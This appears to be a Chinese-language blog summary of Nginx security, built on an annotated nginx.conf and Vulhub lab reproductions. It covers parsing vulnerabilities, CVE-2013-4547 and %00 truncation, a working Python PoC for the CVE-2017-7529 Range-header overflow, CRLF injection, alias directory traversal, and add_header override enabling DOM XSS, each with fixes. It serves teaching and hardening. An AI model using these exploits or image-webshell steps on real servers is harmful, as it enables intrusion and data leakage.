Nginx安全总结
Nginx作为最常见的Web服务器中间件之一,这里小结一下其安全的问题。
基本使用教程请看:Nginx基础教程
Nginx基础
Nginx中HTTP请求流程
Nginx中一个HTTP请求的处理流程如图:
Nginx配置文件详解
######Nginx配置文件nginx.conf中文详解#####
#定义Nginx运行的用户和用户组
user www www;
#nginx进程数,建议设置为等于CPU总核心数。
worker_processes 8;
#全局错误日志定义类型,[ debug | info | notice | warn | error | crit ]
error_log /usr/local/nginx/logs/error.log info;
#进程pid文件
pid /usr/local/nginx/logs/nginx.pid;
#指定进程可以打开的最大描述符:数目
#工作模式与连接数上限
#这个指令是指当一个nginx进程打开的最多文件描述符数目,理论值应该是最多打开文件数(ulimit -n)与nginx进程数相除,但是nginx分配请求并不是那么均匀,所以最好与ulimit -n 的值保持一致。
#现在在linux 2.6内核下开启文件打开数为65535,worker_rlimit_nofile就相应应该填写65535。
#这是因为nginx调度时分配请求到进程并不是那么的均衡,所以假如填写10240,总并发量达到3-4万时就有进程可能超过10240了,这时会返回502错误。
worker_rlimit_nofile 65535;
events
{
#参考事件模型,use [ kqueue | rtsig | epoll | /dev/poll | select | poll ]; epoll模型
#是Linux 2.6以上版本内核中的高性能网络I/O模型,linux建议epoll,如果跑在FreeBSD上面,就用kqueue模型。
#补充说明:
#与apache相类,nginx针对不同的操作系统,有不同的事件模型
#A)标准事件模型
#Select、poll属于标准事件模型,如果当前系统不存在更有效的方法,nginx会选择select或poll
#B)高效事件模型
#Kqueue:使用于FreeBSD 4.1+, OpenBSD 2.9+, NetBSD 2.0 和 MacOS X.使用双处理器的MacOS X系统使用kqueue可能会造成内核崩溃。
#Epoll:使用于Linux内核2.6版本及以后的系统。
#/dev/poll:使用于Solaris 7 11/99+,HP/UX 11.22+ (eventport),IRIX 6.5.15+ 和 Tru64 UNIX 5.1A+。
#Eventport:使用于Solaris 10。 为了防止出现内核崩溃的问题, 有必要安装安全补丁。
use epoll;
#单个进程最大连接数(最大连接数=连接数*进程数)
#根据硬件调整,和前面工作进程配合起来用,尽量大,但是别把cpu跑到100%就行。每个进程允许的最多连接数,理论上每台nginx服务器的最大连接数为。
worker_connections 65535;
#keepalive超时时间。
keepalive_timeout 60;
#客户端请求头部的缓冲区大小。这个可以根据你的系统分页大小来设置,一般一个请求头的大小不会超过1k,不过由于一般系统分页都要大于1k,所以这里设置为分页大小。
#分页大小可以用命令getconf PAGESIZE 取得。
#[root@web001 ~]# getconf PAGESIZE
#4096
#但也有client_header_buffer_size超过4k的情况,但是client_header_buffer_size该值必须设置为“系统分页大小”的整倍数。
client_header_buffer_size 4k;
#这个将为打开文件指定缓存,默认是没有启用的,max指定缓存数量,建议和打开文件数一致,inactive是指经过多长时间文件没被请求后删除缓存。
open_file_cache max=65535 inactive=60s;
#这个是指多长时间检查一次缓存的有效信息。
#语法:open_file_cache_valid time 默认值:open_file_cache_valid 60 使用字段:http, server, location 这个指令指定了何时需要检查open_file_cache中缓存项目的有效信息.
open_file_cache_valid 80s;
#open_file_cache指令中的inactive参数时间内文件的最少使用次数,如果超过这个数字,文件描述符一直是在缓存中打开的,如上例,如果有一个文件在inactive时间内一次没被使用,它将被移除。
#语法:open_file_cache_min_uses number 默认值:open_file_cache_min_uses 1 使用字段:http, server, location 这个指令指定了在open_file_cache指令无效的参数中一定的时间范围内可以使用的最小文件数,如果使用更大的值,文件描述符在cache中总是打开状态.
open_file_cache_min_uses 1;
#语法:open_file_cache_errors on | off 默认值:open_file_cache_errors off 使用字段:http, server, location 这个指令指定是否在搜索一个文件时记录cache错误.
open_file_cache_errors on;
}
#设定http服务器,利用它的反向代理功能提供负载均衡支持
http
{
#文件扩展名与文件类型映射表
include mime.types;
#默认文件类型
default_type application/octet-stream;
#默认编码
#charset utf-8;
#服务器名字的hash表大小
#保存服务器名字的hash表是由指令server_names_hash_max_size 和server_names_hash_bucket_size所控制的。参数hash bucket size总是等于hash表的大小,并且是一路处理器缓存大小的倍数。在减少了在内存中的存取次数后,使在处理器中加速查找hash表键值成为可能。如果hash bucket size等于一路处理器缓存的大小,那么在查找键的时候,最坏的情况下在内存中查找的次数为2。第一次是确定存储单元的地址,第二次是在存储单元中查找键 值。因此,如果Nginx给出需要增大hash max size 或 hash bucket size的提示,那么首要的是增大前一个参数的大小.
server_names_hash_bucket_size 128;
#客户端请求头部的缓冲区大小。这个可以根据你的系统分页大小来设置,一般一个请求的头部大小不会超过1k,不过由于一般系统分页都要大于1k,所以这里设置为分页大小。分页大小可以用命令getconf PAGESIZE取得。
client_header_buffer_size 32k;
#客户请求头缓冲大小。nginx默认会用client_header_buffer_size这个buffer来读取header值,如果header过大,它会使用large_client_header_buffers来读取。
large_client_header_buffers 4 64k;
#设定通过nginx上传文件的大小
client_max_body_size 8m;
#开启高效文件传输模式,sendfile指令指定nginx是否调用sendfile函数来输出文件,对于普通应用设为 on,如果用来进行下载等应用磁盘IO重负载应用,可设置为off,以平衡磁盘与网络I/O处理速度,降低系统的负载。注意:如果图片显示不正常把这个改成off。
#sendfile指令指定 nginx 是否调用sendfile 函数(zero copy 方式)来输出文件,对于普通应用,必须设为on。如果用来进行下载等应用磁盘IO重负载应用,可设置为off,以平衡磁盘与网络IO处理速度,降低系统uptime。
sendfile on;
#开启目录列表访问,合适下载服务器,默认关闭。
autoindex on;
#此选项允许或禁止使用socke的TCP_CORK的选项,此选项仅在使用sendfile的时候使用
tcp_nopush on;
tcp_nodelay on;
#长连接超时时间,单位是秒
keepalive_timeout 120;
#FastCGI相关参数是为了改善网站的性能:减少资源占用,提高访问速度。下面参数看字面意思都能理解。
fastcgi_connect_timeout 300;
fastcgi_send_timeout 300;
fastcgi_read_timeout 300;
fastcgi_buffer_size 64k;
fastcgi_buffers 4 64k;
fastcgi_busy_buffers_size 128k;
fastcgi_temp_file_write_size 128k;
#gzip模块设置
gzip on; #开启gzip压缩输出
gzip_min_length 1k; #最小压缩文件大小
gzip_buffers 4 16k; #压缩缓冲区
gzip_http_version 1.0; #压缩版本(默认1.1,前端如果是squid2.5请使用1.0)
gzip_comp_level 2; #压缩等级
gzip_types text/plain application/x-javascript text/css application/xml; #压缩类型,默认就已经包含textml,所以下面就不用再写了,写上去也不会有问题,但是会有一个warn。
gzip_vary on;
#开启限制IP连接数的时候需要使用
#limit_zone crawler $binary_remote_addr 10m;
#负载均衡配置
upstream jh.w3cschool.cn {
#upstream的负载均衡,weight是权重,可以根据机器配置定义权重。weigth参数表示权值,权值越高被分配到的几率越大。
server 192.168.80.121:80 weight=3;
server 192.168.80.122:80 weight=2;
server 192.168.80.123:80 weight=3;
#nginx的upstream目前支持4种方式的分配
#1、轮询(默认)
#每个请求按时间顺序逐一分配到不同的后端服务器,如果后端服务器down掉,能自动剔除。
#2、weight
#指定轮询几率,weight和访问比率成正比,用于后端服务器性能不均的情况。
#例如:
#upstream bakend {
# server 192.168.0.14 weight=10;
# server 192.168.0.15 weight=10;
#}
#2、ip_hash
#每个请求按访问ip的hash结果分配,这样每个访客固定访问一个后端服务器,可以解决session的问题。
#例如:
#upstream bakend {
# ip_hash;
# server 192.168.0.14:88;
# server 192.168.0.15:80;
#}
#3、fair(第三方)
#按后端服务器的响应时间来分配请求,响应时间短的优先分配。
#upstream backend {
# server server1;
# server server2;
# fair;
#}
#4、url_hash(第三方)
#按访问url的hash结果来分配请求,使每个url定向到同一个后端服务器,后端服务器为缓存时比较有效。
#例:在upstream中加入hash语句,server语句中不能写入weight等其他的参数,hash_method是使用的hash算法
#upstream backend {
# server squid1:3128;
# server squid2:3128;
# hash $request_uri;
# hash_method crc32;
#}
#tips:
#upstream bakend{#定义负载均衡设备的Ip及设备状态}{
# ip_hash;
# server 127.0.0.1:9090 down;
# server 127.0.0.1:8080 weight=2;
# server 127.0.0.1:6060;
# server 127.0.0.1:7070 backup;
#}
#在需要使用负载均衡的server中增加 proxy_pass http://bakend/;
#每个设备的状态设置为:
#1.down表示单前的server暂时不参与负载
#2.weight为weight越大,负载的权重就越大。
#3.max_fails:允许请求失败的次数默认为1.当超过最大次数时,返回proxy_next_upstream模块定义的错误
#4.fail_timeout:max_fails次失败后,暂停的时间。
#5.backup: 其它所有的非backup机器down或者忙的时候,请求backup机器。所以这台机器压力会最轻。
#nginx支持同时设置多组的负载均衡,用来给不用的server来使用。
#client_body_in_file_only设置为On 可以讲client post过来的数据记录到文件中用来做debug
#client_body_temp_path设置记录文件的目录 可以设置最多3层目录
#location对URL进行匹配.可以进行重定向或者进行新的代理 负载均衡
}
#虚拟主机的配置
server
{
#监听端口
listen 80;
#域名可以有多个,用空格隔开
server_name www.w3cschool.cn w3cschool.cn;
index index.html index.htm index.php;
root /data/www/w3cschool;
#对******进行负载均衡
location ~ .*.(php|php5)?$
{
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include fastcgi.conf;
}
#图片缓存时间设置
location ~ .*.(gif|jpg|jpeg|png|bmp|swf)$
{
expires 10d;
}
#JS和CSS缓存时间设置
location ~ .*.(js|css)?$
{
expires 1h;
}
#日志格式设定
#$remote_addr与$http_x_forwarded_for用以记录客户端的ip地址;
#$remote_user:用来记录客户端用户名称;
#$time_local: 用来记录访问时间与时区;
#$request: 用来记录请求的url与http协议;
#$status: 用来记录请求状态;成功是200,
#$body_bytes_sent :记录发送给客户端文件主体内容大小;
#$http_referer:用来记录从那个页面链接访问过来的;
#$http_user_agent:记录客户浏览器的相关信息;
#通常web服务器放在反向代理的后面,这样就不能获取到客户的IP地址了,通过$remote_add拿到的IP地址是反向代理服务器的iP地址。反向代理服务器在转发请求的http头信息中,可以增加x_forwarded_for信息,用以记录原有客户端的IP地址和原来客户端的请求的服务器地址。
log_format access '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" $http_x_forwarded_for';
#定义本虚拟主机的访问日志
access_log /usr/local/nginx/logs/host.access.log main;
access_log /usr/local/nginx/logs/host.access.404.log log404;
#对 "/" 启用反向代理
location / {
proxy_pass http://127.0.0.1:88;
proxy_redirect off;
proxy_set_header X-Real-IP $remote_addr;
#后端的Web服务器可以通过X-Forwarded-For获取用户真实IP
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
#以下是一些反向代理的配置,可选。
proxy_set_header Host $host;
#允许客户端请求的最大单文件字节数
client_max_body_size 10m;
#缓冲区代理缓冲用户端请求的最大字节数,
#如果把它设置为比较大的数值,例如256k,那么,无论使用firefox还是IE浏览器,来提交任意小于256k的图片,都很正常。如果注释该指令,使用默认的client_body_buffer_size设置,也就是操作系统页面大小的两倍,8k或者16k,问题就出现了。
#无论使用firefox4.0还是IE8.0,提交一个比较大,200k左右的图片,都返回500 Internal Server Error错误
client_body_buffer_size 128k;
#表示使nginx阻止HTTP应答代码为400或者更高的应答。
proxy_intercept_errors on;
#后端服务器连接的超时时间_发起握手等候响应超时时间
#nginx跟后端服务器连接超时时间(代理连接超时)
proxy_connect_timeout 90;
#后端服务器数据回传时间(代理发送超时)
#后端服务器数据回传时间_就是在规定时间之内后端服务器必须传完所有的数据
proxy_send_timeout 90;
#连接成功后,后端服务器响应时间(代理接收超时)
#连接成功后_等候后端服务器响应时间_其实已经进入后端的排队之中等候处理(也可以说是后端服务器处理请求的时间)
proxy_read_timeout 90;
#设置代理服务器(nginx)保存用户头信息的缓冲区大小
#设置从被代理服务器读取的第一部分应答的缓冲区大小,通常情况下这部分应答中包含一个小的应答头,默认情况下这个值的大小为指令proxy_buffers中指定的一个缓冲区的大小,不过可以将其设置为更小
proxy_buffer_size 4k;
#proxy_buffers缓冲区,网页平均在32k以下的设置
#设置用于读取应答(来自被代理服务器)的缓冲区数目和大小,默认情况也为分页大小,根据操作系统的不同可能是4k或者8k
proxy_buffers 4 32k;
#高负荷下缓冲大小(proxy_buffers*2)
proxy_busy_buffers_size 64k;
#设置在写入proxy_temp_path时数据的大小,预防一个工作进程在传递文件时阻塞太长
#设定缓存文件夹大小,大于这个值,将从upstream服务器传
proxy_temp_file_write_size 64k;
}
#设定查看Nginx状态的地址
location /NginxStatus {
stub_status on;
access_log on;
auth_basic "NginxStatus";
auth_basic_user_file confpasswd;
#htpasswd文件的内容可以用apache提供的htpasswd工具来产生。
}
#本地动静分离反向代理配置
#所有jsp的页面均交由tomcat或resin处理
location ~ .(jsp|jspx|do)?$ {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_pass http://127.0.0.1:8080;
}
#所有静态文件由nginx直接读取不经过tomcat或resin
location ~ .*.(htm|html|gif|jpg|jpeg|png|bmp|swf|ioc|rar|zip|txt|flv|mid|doc|ppt|
pdf|xls|mp3|wma)$
{
expires 15d;
}
location ~ .*.(js|css)?$
{
expires 1h;
}
}
}
######Nginx配置文件nginx.conf中文详解#####
Nginx解析漏洞
未知文件解析漏洞
漏洞原理
该漏洞与Nginx版本、PHP版本无关,属于用户配置不当造成的解析漏洞。
两个核心配置:
cgi.fix_pathinfo
:php.ini的配置项,当该配置项值为1时,用于修复路径,如果当前路径不存在则采用上层路径,比如传入/test.png/1.php
路径、由于1.php
不存在则会在传给FastCGI处理的路径就变为test.png
。该配置项默认为1;security.limit_extensions
:php-fpm.conf 配置项,此配置项限制了FastCGI解析文件的类型(即指定什么类型的文件当做PHP代码解析),但此项设置为空时是允许FastCGI将任意类型的文件当做PHP代码来解析的;
环境搭建
直接用的Vulhub:https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/
漏洞复现
先制作一个图片马:
cat info.php >> nginx.png
然后上传图片,访问返回的地址,图片能正常访问:
然后访问:
http://172.20.205.137/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png/.php
发现图片以php进行解析。
漏洞分析
漏洞根源就是配置存在问题,直接看配置文件的设置。
先看到php.ini,这里环境没有php.ini文件,直接看php.ini-development或php.ini-production,其中并没有配置cgi.fix_pathino
配置项,但是其默认值就是1,即启用修复路径,在前面输入路径/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png/.php
时,由于.php
不存在,因此实际传入给FastCGI的是/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png
路径来进行解析:
接着看php-fpm.conf,文件内容中没有security.limit_extensions
配置项,但是include=etc/php-fpm.d/*.conf
引入了该目录中的所有.conf
文件,在其中的www-2.conf
文件中找到了该配置项,且该配置项为空,即没有进行任何限制、可以以PHP代码来解析由上层Nginx传下来的/uploadfiles/d2eb2a853ff1dfe9df7ef1fdeec63063.png
路径文件,从而触发解析漏洞:
修复方法
针对配置项修复即可:
- 修改php.ini文件中
cgi.fix_pathino
配置项的值为0; - 添加php-fpm.conf文件中
security.limit_extensions
配置项的值为php,即限定FastCGI只对PHP相关后缀文件进行PHP代码解析;
文件名逻辑漏洞(CVE-2013-4547)
影响版本
Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
漏洞原理
由于Nginx存在文件名逻辑漏洞、会错误地解析请求的URI,导致获取到了错误的文件名,从而可能造成权限绕过、代码执行等安全漏洞。
环境搭建
直接用的Vulhub:https://vulhub.org/#/environments/nginx/CVE-2013-4547/
漏洞复现
最大的危害当然就是解析漏洞了,能解析PHP代码从而执行任意命令。
直接上传WebShell文件,修改文件名后缀为.jpg[空格]
,即在文件后缀名后面追加个空格:
访问:
http://your-ip:8080/uploadfiles/info.jpg[0x20][0x00].php
这里直接在Hex栏修改:
修改好之后复制回去:
当然,除了解析漏洞外,文件名逻辑漏洞还能造成访问限制绕过等的安全风向。
这里修改下nginx.conf配置,/admin/
目录限定只能本地访问:
worker_processes 1;
events {
worker_connections 1024;
}
http {
include mime.types;
default_type application/octet-stream;
sendfile on;
keepalive_timeout 65;
server {
listen 80;
server_name localhost;
root html;
index index.php;
charset utf-8;
location /admin/ {
allow 127.0.0.1;
deny all;
}
}
}
然后在www目录下新建个/admin/index.php
文件,内容随意;再创建一个/test[空格]
目录(这里需要Linux下创建,因为window不允许文件名最后带空格)
配置好后重启服务,直接访问 /admin/index.php 显示403:
但是可以利用文件名解析漏洞进行访问,绕过了Nginx路由限制:
漏洞分析
漏洞根源就是配置存在问题,直接看配置文件的设置。这里以解析漏洞的实例分析。
先看到nginx.conf,当Nginx匹配到.php
结尾的请求,就发送给FastCGI进行解析:
location ~ \.php$ {
root html;
include fastcgi_params;
fastcgi_pass php:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
fastcgi_param DOCUMENT_ROOT /var/www/html;
}
这是很常见的写法,但是在漏洞版本的Nginx中,如果收到shell.jpg[0x20][0x00].php
的请求时,这个URI可以匹配上如上图的正则\.php$
的Location块,其中Nginx会识别到请求的文件是shell.jpg[0x20]
,就设置其为SCRIPT_FILENAME
的值发送给FastCGI进行解析,而PHP-FPM中并未设置security.limit_extensions
配置项的值,从而可以以PHP代码来解析shell.jpg[0x20]
文件,触发解析漏洞:
修复方法
- 升级Nginx版本;
- 添加php-fpm.conf文件中
security.limit_extensions
配置项的值为php,即限定FastCGI只对PHP相关后缀文件进行PHP代码解析;
%00截断解析漏洞
这部分Nginx版本过低,已经很少见了。
影响版本
Nginx 0.5., 0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
漏洞原理
对于低版本的Nginx,可以在任意文件名后面添加%00.php进行解析攻击。
如:1.jpg%00.php就会将前面1.jpg文件当成PHP文件进行解析执行。
修复方法
- 升级Nginx版本;
Nginx整数溢出漏洞(CVE-2017-7529)
影响版本
Nginx 0.5.6 ~ 1.13.2
漏洞原理
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。
如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
环境搭建
直接用的Vulhub:https://vulhub.org/#/environments/nginx/CVE-2017-7529/
漏洞复现
正常访问Web页面,是Nginx默认页面,该页面实际上是反向代理的8081端口的内容:
这里直接看P神Vulhub中的PoC:
#!/usr/bin/env python
import sys
import requests
if len(sys.argv) < 2:
print("%s url" % (sys.argv[0]))
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
sys.exit()
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
print(r.text)
运行python poc.py http://your-ip:8080/
后,可以看到是越界读取到了Cache文件头及其内容(Nginx和被代理的服务器之间的响应报文头和Body内容等):
漏洞分析
先看到Nginx配置文件nginx.conf,其中包含了如下conf文件:
proxy_cache_path /tmp/nginx levels=1:2 keys_zone=cache_zone:10m;
proxy_cache_valid 200 10m;
server {
listen 8081;
server_name localhost;
charset utf-8;
location / {
root /usr/share/nginx/html;
index index.html;
}
}
server {
listen 8080;
server_name localhost;
charset utf-8;
location / {
proxy_pass http://127.0.0.1:8081/;
proxy_set_header HOST $host;
proxy_cache cache_zone;
add_header X-Proxy-Cache $upstream_cache_status;
proxy_ignore_headers Set-Cookie;
}
}
看到,其中关键Nginx设置如下:
- proxy_cache_path:设置缓存文件的路径和参数;
- proxy_cache_valid:设定缓存有效期;
- proxy_pass:反向代理配置,参数为代理的目标服务地址;
- proxy_cache:指定使用的keys_zone名称,这里就是上面的cache_zone;
- add_header:在Nginx返回的HTTP头中增加一项X-Proxy-Cache,如果缓存命中其值为HIT,未命中则为MISS;
- proxy_ignore_headers:Nginx不会缓存带有Set-Cookie的返回,因此这里设置忽略该HTTP头;
由此可知,正常访问之后,就会缓存目标页面内容到proxy_cache_path指定的目录中,查看确实存在Cache文件,前面部分是Cache文件头部信息包括Key,后面就是响应报文的内容:
可以看到,这和前面通过PoC脚本触发整数溢出漏洞来获取到的Cache文件内容是一致的。
OK,来看下根源的代码问题,从补丁修复代码看起,主要在ngx_http_range_filter_module.c的ngx_http_range_parse()函数上做了两次修改:
- Range filter: protect from total size overflows.:防止Range中total_size即总大小参数的整数溢出;
- Range filter: avoid negative range start.:防止Range中start参数为负数的整数溢出;
据此可知,本次整数溢出漏洞的漏洞点正是出在Nginx处理HTTP请求头Range的数值时并没有进行整数溢出漏洞过滤而导致的。其中bytes-range读取的起始范围可能为负数,从而读取缓存文件头部。
更多的漏洞分析请参考:CVE-2017-7529 Nginx整数溢出漏洞分析
修复方法
- 升级Nginx版本;
Nginx不安全配置
当Nginx配置不当时,也会导致一些安全问题。
下面的环境均搭建自Vulhub:https://vulhub.org/#/environments/nginx/insecure-configuration/
CRLF注入漏洞
漏洞原理
Nginx的内置遍历$uri
是指当前的请求URI,不包括任何参数(见$args
)。其中,Nginx会对$uri
进行解码操作。如果攻击者在URI中注入%0a%0d
就会造成CRLF注入漏洞。
Demo
不安全配置示例如下,即直接将$uri
拼接到302重定向的地址上,会造成CRLF注入漏洞:
server {
listen 8080;
root /usr/share/nginx/html;
index index.html;
server_name _;
location / {
return 302 https://$host$uri;
}
}
直接在URI栏注入即可,比如注入Set-Cookie头:
可以往响应报文Body注入XSS payload,但是这里由于Location头的值协议不可控、302这处无法直接在浏览器触发XSS:
防御方法
审计Nginx配置文件中$uri
的使用位置,禁止直接用在URL跳转地址的拼接上。
目录穿越漏洞
漏洞原理
Nginx服务器通过设置Alias别名的方式,可以使不在网站根目录下的目录也能被Web访问。
Nginx的配置autoindex作用是自动创建索引,换句话说就是目录浏览功能,当为on时页面可以显示当前目录下所有文件/目录内容,当为off时页面为403 Forbidden。
如果在配置别名(Alias)的时候,忘记在location的目录最后追加/
,会导致存在目录穿越漏洞。
Demo
看个不安全的配置示例:
server {
listen 8081;
root /usr/share/nginx/html;
index index.html;
server_name _;
autoindex on;
location /files {
alias /home/;
}
}
正常访问,由于autoindex为on,页面就显示了home目录中的所有文件和目录:
访问/files../
的时候就会目录穿越:
当然,并非autoindex开启了才能利用,只是说页面会展示出当前目录下所有的文件和目录信息而已,方便查看,即使不开启autoindex也能直接目录穿越获取目标文件、只是访问目录的时候为403而已。
比如去掉autoindex on这个配置后,访问/file../etc/
目录时是403,但是访问具体文件就能直接下载了:
注意,此处场景目录穿越只能往上穿一层,示例中刚好上一层就是根目录因此可以看到所有文件和目录,但是实际场景可能目录穿越的利用很有限。
防御方法
在Nginx配置文件中location的目录最后必须要追加/
。
add_header被覆盖
漏洞原理
add_header是headers模块中定义的一个指令,用来添加HTTP响应头部。
Nginx是分层级组织的,每层可以有自己的指令,子块继承父块的配置;但对于相同指令,子块的配置可以覆盖掉父块的配置。子块中如果设置了add_header,那么就会覆盖掉父块中的add_header,这样就可能会造成一些安全风险。
Demo
不安全的配置示例,原本在Web整站即父块中添加了CSP头和X-Frame-Options头设置的,其在子块/test1目录是直接使用生效的,但是在另一个子块/test2目录中会重新add_header导致前面整站的add_header设置被覆盖:
server {
listen 8082;
root /usr/share/nginx/html;
index index.html;
server_name _;
autoindex on;
add_header Content-Security-Policy "default-src 'self'";
add_header X-Frame-Options DENY;
location = /test1 {
rewrite ^(.*)$ /xss.html break;
}
location = /test2 {
add_header X-Content-Type-Options nosniff;
rewrite ^(.*)$ /xss.html break;
}
}
正常访问/test1目录,响应头确实设置了CSP头和X-Frame-Options头,其中页面是引用了一个JS文件:
这个JS文件就是往页面id为m的标签内写入当前URL中#号后面的内容,即存在DOM XSS风险:
这里注意个细节,如果直接引用这个JS脚本,无论后面有没有CSP都无法成功触发XSS,这是因为默认这个输出是对关键字符如尖括号进行了URL编码的,此时需要我们稍微改下app.js的代码,添加个URL解码操作即对获取到URI栏的内容调用decodeURI()函数才能成功:
window.onload = function() {
var m = document.getElementById('m');
m.innerHTML = decodeURI(location.hash.substr(1));
}
由于CSP设置为default-src 'self'
即只允许同源下的资源,这里/static/app.js是同源资源因此可以加载进来执行,但不允许内联资源(要允许内联资源需要设置’unsafe-inline’,其允许如内联的script元素、javascript: URL、内联的事件处理函数和内联的style元素等)。也就是说,即使注入XSS payload,如下的内联的on事件也是不会执行的:
当我们访问/test2目录时,看到响应报文并没有前面整站设置的CSP头和X-Frame-Options头,而是该子块直接设置的X-Content-Type-Options头,也就是说父块的add_header被子块的add_header覆盖了:
结合前面的存在DOM XSS风险,这里由于没有CSP限制所以能成功触发利用:
注意,这里XSS payload不能用<script>
标签、会无法触发执行,这是因为这个DOM操作是用的innerHTML来进行的,需要用如<img>
等标签来注入才能成功。
防御方法
非必须不要设置在子块再次配置add_header来覆盖父块的add_header配置;如果业务需要必须设置,则需要严格审计是否会出现相关的安全风险。